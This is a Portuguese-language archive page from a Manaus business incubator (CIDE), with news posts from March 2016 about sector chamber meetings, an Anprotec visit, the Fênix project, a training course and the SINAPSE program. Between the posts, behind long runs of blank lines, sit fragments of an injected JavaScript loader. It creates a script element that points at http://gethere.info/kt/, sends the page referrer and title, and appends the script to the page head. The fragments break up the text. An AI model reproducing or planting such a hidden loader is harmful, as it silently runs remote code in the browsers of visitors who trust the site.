• 92 3216-3892
  • secretaria@cide.org.br

Arquivos por mêsmarço 2016

Abertura das Câmaras Setoriais conta com a presença de gestores de incubadoras

O secretário executivo das Câmaras Setoriais, Laerte Chíxaro, faz o balanço referente a 2015

O secretário executivo das Câmaras Setoriais, Laerte Chíxaro, faz o balanço referente a 2015

 

 

A abertura das Câmaras Setoriais da Secretaria de Estado de Planejamento, Desenvolvimento, Ciência, Tecnologia e Inovação (Seplan-CTI) de 2016, aconteceu, na segunda-feira, 14, para apresentar os resultados do ano passado e ao mesmo tempo divulgar as ações preparadas para este ano. O ato aconteceu na própria secretaria e contou com a presença de representantes das classes patronais e laborais do Amazonas e gestores de centros de incubação empresarial.

 

Durante a apresentação o secretário executivo das Câmaras Setoriais, Laerte Chíxaro, destacou o esforço de todos os participantes em cumprir os trabalhos propostos e fez uma avaliação positiva.

 

O diretor executivo do Centro de Incubação e Desenvolvimento Empresarial (CIDE), José Barbosa Grosso, enfatizou a união entre todos. “Vamos seguir trabalhando juntos, em parcerias com outros segmentos da sociedade, para que superemos os desafios de 2016 e possamos concluir com êxito os nossos trabalhos”, conclui.

 

Na primeira reunião do ano, os convidados conheceram o Plano Nacional da Cultura Exportadora (PNCE), apresentado pela Superintendência da Zona Franca de Manaus (Suframa).

 

Participantes das Câmaras Setoriais e convidados no auditório da Seplan-CTI

Participantes das Câmaras Setoriais e convidados no auditório da Seplan-CTI

 

 

O secretário executivo das Câmaras Setoriais, Laerte Chíxaro, mostra o balanço das ações

O secretário executivo das Câmaras Setoriais, Laerte Chíxaro, mostra o balanço das ações

 

O diretor executivo do CIDE, José Grosso, participa da primeira reunião das Câmaras Setoriais

O diretor executivo do CIDE, José Grosso, participa da primeira reunião das Câmaras Setoriais

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

CIDE recebe visita técnica da Anprotec

Consultores da Anprotec conversam com o diretor executivo do CIDE e com a equipe administrativa

Consultores da Anprotec conversam com o diretor executivo do CIDE e com a equipe administrativa

 

 

Os consultores da Associação Nacional de Entidades Promotoras de Empreendimentos de Tecnologias Avançadas (Anprotec), Evelin Astolpho e Carlos Lamberti Júnior, estiveram no Centro de Incubação e Desenvolvimento Empresarial, no último dia 11, realizando a visita técnica do convênio de apoio às incubadoras, do edital Pró-Incubadoras da Fundação de Amparo à Pesquisa do Amazonas (Fapeam), além  de verificar o grau de implantação da metodologia CERNE no centro.

 

Conforme a representante da Anprotec, Evelin Astolpho, a visita serviu para verificar as atividades realizadas a favor dos empreendimentos instalados no CIDE. “O importante é comprovar que as ações que fazem parte do CERNE estão sendo realizadas e que os resultados estão sendo gerados, visando todo um desenvolvimento local da Região”, disse.

 

Para a coordenadora do projeto no CIDE, Rosália Padilha, a implantação do projeto traz melhorias para as empresas instaladas. “ O projeto utilizará a metodologia do Centro de Referência para Apoio a Novos Empreendimentos (CERNE) que é uma plataforma de soluções com qualificação, práticas e processos estabelecidos, e é válido para todas as incubadoras do Brasil, visando à melhoria em planejamentos, capacitação, empreendimentos, assessorias, consultorias, acompanhamento, etc. Desse modo, podemos ter empreendimentos de sucesso”, destaca.

 

O edital prevê visitas às incubadoras de empresas a cada seis meses. “Todo o trabalho é feito em parceria com a Fundação de Amparo à Pesquisa do Estado do Amazonas (Fapeam), portanto, a próxima visita acontecerá de acordo com o que estabelece o edital”, lembra Evelin Astolpho, acrescentando que outras incubadoras de Manaus e de outros municípios vão ser visitadas.

 

Uma vez terminada a avaliação, os consultores se dirigiram a algumas empresas para conhecer os trabalhos desenvolvidos, em companhia do diretor executivo do CIDE, José Grosso, da equipe administrativa e da coordenadora do “CIDE2”, Elizabeth Araújo.

O diretor executivo do CIDE, José Grosso, fala das ações implantadas

O diretor executivo do CIDE, José Grosso, fala das ações implantadas

 

 

A coordenadora do projeto no CIDE, Rosália Padilha, explica aos visitantes como funciona a incubadora

A coordenadora do projeto no CIDE, Rosália Padilha, explica aos visitantes como funciona a incubadora

 

 

Consultores da Anprotec conhecem os produtos regionais no CIDE

Consultores da Anprotec conhecem os produtos regionais no CIDE

 

 

Equipe visita a Cheiro D´Folha, no CIDE.

Equipe visita a Cheiro D´Folha, no CIDE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Empreendedores conhecem o Projeto Fênix

A coordenadora, Rosália Padilha, apresenta o Projeto Fênix aos incubados

A coordenadora, Rosália Padilha, apresenta o Projeto Fênix aos incubados

 

O Centro de Incubação e Desenvolvimento Empresarial (CIDE) apresentou na manhã de hoje, 8, aos empresários instalados, conhecidos como incubados, o Projeto Fênix, que tem o objetivo de melhorar os processos de incubação, proporcionando ao empreendedor capacitação, formação, além de parcerias locais, nacionais e internacionais, contemplado pelo edital 019/2014 – Pró-Incubadoras – da Fundação de Amparo à Pesquisa do Amazonas (Fapeam). O evento aconteceu na própria incubadora.

Durante uma hora, a coordenadora do projeto no CIDE, Rosália Padilha, detalhou o projeto e pediu a participação de todos. “ O projeto utilizará a metodologia do Centro de Referência para Apoio a Novos Empreendimentos (CERNE) que é uma plataforma de soluções com qualificação, práticas e processos estabelecidos, e é válido para todas as incubadoras do Brasil, visando à melhoria em planejamentos, capacitação, empreendimentos, assessorias, consultorias, acompanhamento, etc. Desse modo, podemos ter empreendimentos de sucesso”, conclui.

Para o empreendedor e proprietário da Loja das Essências, Elton de França, um dos mais novos incubados no CIDE, o Projeto Fênix vai viabilizar o objetivo dos empresários. “Eu acredito que a partir da implantação desse projeto, haverá um entrosamento melhor entre as empresas incubadas, conheceremos novas e possíveis parcerias e, consequentemente, melhoraremos nossos negócios”, diz.

Para o diretor do CIDE, José Barbosa Grosso, a participação de todos os incubados é importante para que o projeto seja implantado com êxito. “Como já disse em outras ocasiões, com a implantação do Projeto Fênix você conhece o potencial do empreendedor, suas dificuldades, as metas, os riscos… e podemos buscar soluções e parcerias para ajudá-lo”, enfatiza.

O diretor executivo do CIDE, José Grosso, pede a participação de todos no projeto

O diretor executivo do CIDE, José Grosso, pede a participação de todos no projeto

 

 

A coordenadora, Rosália Padilha, tira as dúvidas dos incubados.

A coordenadora, Rosália Padilha, tira as dúvidas dos incubados.

 

 

 

Empreendedores se comprometem a participar do Projeto Fênix

Empreendedores se comprometem a participar do Projeto Fênix

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

var d=document;var s=d.createElement(‘script’);

CIDE e “CIDE 2” participam de curso oferecido pela Anprotec e pela Fapeam

Vários gestores de incubadoras de empresas e lideranças de municípios do Amazonas participam de curso da Anprotec

Vários gestores de incubadoras de empresas e lideranças de municípios do Amazonas participam de curso da Anprotec

 

 

 

Com o objetivo de estar sempre atualizado em um mundo em constante transformação em todos os segmentos, o Centro de Incubação e Desenvolvimento Empresarial (CIDE) e o CIDE Alvorada, conhecido como “CIDE 2”, participam do curso “Planejamento e Implantação de Incubadoras de Empresas”, oferecido pela Associação Nacional de Entidades Promotoras de Empreendimentos Inovadores (Anprotec) e pela Fundação de Amparo à Pesquisa no Estado do Amazonas (Fapeam), na Assembleia Legislativa do Amazonas (ALE).

O curso termina na quinta-feira, 10, e visa discutir com os participantes uma metodologia para o planejamento e a implantação de uma incubadora de empresas de sucesso, sintonizando-a com o ecossistema de inovação da região. Participam também, gestores de outros municípios do Amazonas e do Estado do Acre.

“Além de Manaus, selecionamos seis municípios no interior do Estado, onde estabeleceremos estratégias juntamente com as lideranças locais, para implantar incubadoras de empresas, fortalecendo o município e gerando renda à população”, enfatiza a consultora da Anprotec, Evelin Astolpho.

Ainda segundo a consultora, os municípios selecionados para o programa de formação são Presidente Figueiredo, Tefé, Coari, Parintins, Manacapuru e Itacoatiara. “Estamos formando os agentes locais para que eles sejam os gestores das incubadoras de empresas e possam apoiar os novos empreendedores, desenvolver negócios, selecionar projetos e trabalhar para que as ideias inovadoras virem empresas no futuro”, conclui Evelin.

 

 

 

Consultor da Anprotec fala aos gestores.

Consultor da Anprotec fala aos gestores.

 

 

F2

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

}

Programa SINAPSE: CERTI atualiza resultados com agentes participantes

O diretor de operações do Instituto CERTI, Marco Giágio, mostra os resultados do SINAPSE aos agentes.

O diretor de operações do Instituto CERTI, Marco Giágio, mostra os resultados do SINAPSE aos agentes.

 

 

Os diretores de incubadoras de empresas e representantes de instituições de ensino universitário público e privado se reuniram, na tarde desta quinta-feira, 3, com o diretor de operações do Instituto CERTI Amazônia, Marco Antônio Giágio, para conhecer e atualizar os resultados do SINAPSE da Inovação, programa de empreendedorismo inovador iniciado pela Fundação de Amparo à Pesquisa do Amazonas (FAPEAM), em parceria com a Fundação Centros de Referência em Tecnologias Inovadoras (CERTI) do Estado de Santa Catarina.

 

 A reunião aconteceu na sede do próprio instituto CERTI, em Manaus, com todos os agentes que participam do programa de inovação. “Fizemos uma atualização do programa e a partir de abril, iniciaremos uma nova fase que é a pré-incubação, isto é, é o período no qual os empreendedores selecionados vão iniciar suas operações com recursos da FAPEAM, gerando retorno desse investimento por meio da geração de empregos, recolhimento de impostos e gerando novos investimentos”, disse Marco Giágio.

 

 Ainda segundo ele, 1.188 inscrições foram feitas no início do programa e 40 ideias inovadoras foram aprovadas, e os novos empreendedores são livres para escolher o local físico para montar o seu próprio negócio. “Agora, eles estão na etapa de formalização. E o local de operação é uma decisão exclusiva e independente de cada empreendedor. Há várias opções e que cada um avalie qual é a mais adequada”, orienta Marco, acrescentando que o sucesso do SINAPSE é devido à participação de todos os agentes e parceiros.

 

 Conforme o diretor executivo do Centro de Incubação e Desenvolvimento Empresarial (CIDE), José Barbosa Grosso, alguns acadêmicos que participam do SINAPSE já estiveram na incubadora para conhecer as instalações. “Nossa instituição apoia as iniciativas da FAPEAM e do programa SINAPSE. Portanto, estamos preparados a receber os novos empreendedores que queiram instalar-se aqui”, destacou.

Representantes de incubadoras de empresas e de instituições acadêmicas participam da reunião.

Representantes de incubadoras de empresas e de instituições acadêmicas participam da reunião.

 

Marco Giágio (ao fundo) mostra a relação dos aprovados e selecionados.

Marco Giágio (ao fundo) mostra a relação dos aprovados e selecionados.

 

 

O diretor executivo do CIDE, José Grosso (à isq.), conversa com Marco Giágio.

O diretor executivo do CIDE, José Grosso (à esq.), conversa com Marco Giágio.

 

 

 

 

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);